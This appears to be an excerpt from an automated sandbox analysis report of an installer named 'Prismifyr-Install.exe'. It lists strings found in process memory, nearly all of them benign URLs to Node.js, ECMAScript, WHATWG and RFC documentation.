      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
      Source: Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE5A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
      Source: Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0-headers.tar.gz
      Source: Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gz
      Source: Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/win-x64/node.lib
      Source: powershell.exe, 00000004.00000002.67582200182.0000026AF4E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67568805952.0000026AE6364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67582200182.0000026AF4FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000004.00000002.67585054806.0000026AFCF3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67745105605.00000233F345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://webassembly.github.io/spec/web-api
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
